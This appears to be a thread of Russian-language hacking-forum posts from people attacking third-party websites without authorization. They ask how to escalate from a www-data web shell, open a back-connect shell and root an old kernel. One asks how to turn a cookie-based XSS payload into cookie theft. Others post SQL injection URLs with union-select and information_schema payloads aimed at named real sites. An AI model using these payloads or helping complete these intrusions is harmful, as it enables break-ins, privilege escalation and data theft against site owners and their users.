Подскажите пожалуйста есть шелл!Права uid=33(www-data) gid=33(www-data).safe mode-off!Не подскажите как можно пройти выше по каталогам?стоит Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.5?токо не судите строго!читал что можно как то открыть порт.и потом к нему присоедениться!
Здравствуйте. На сайте есть изменение цвета скина. "Переменная" берется через куки. Т.е. color: green стоит. Если же поставить color: "><script>alert()</script>, то прекрасно срабатывает. Есть возможность через другой локальный сайт установить для домена сайта, на котором есть уязвимость, куки с xss (или css, точно не знаю). Возможно ли как-нибудь использовать данную уязвимость, чтобы украсть куки или что-либо другое помимо простого алерта?
по любому что бы залить шелл тебе нужен полный путь, в пхпмаядмине тоже через базу заливать надо...так что без путей никуда
http://www.mymac.ru/forum_heritage/showthreaded.php?Cat=-1%20union%20select%201%202%203%204%205%20-- Вот здесь скуля ,а понять ни чего не могу . Кажется ,видно SQL ERROR: Unable to do_query: REPLACE INTO w3t_Online (O_Username,O_Last,O_What) VALUES ('-ANON-95.190.179.255','1265722842','showthreaded') а что и как незнаю. Дайте совет. Спасибо .
2 udman Code: http://krasn.int.ru/a-t_presents_category_hphp/login-hisotex/cat-1499999+union+select+1,2,3,table_name,5+from+information_schema%252etables+--+
Столкнулся с проблемой: nmap 5 не сканирует внешние ипы, только моей сети, в то время как xSpider 7.5 справляется на ура. В чём трабл?
есть шелл, на сервере включен сейф.. возможно как-то запустить бэк-коннект? disable_functions No value. хочу порутать,ядро 2007 года..
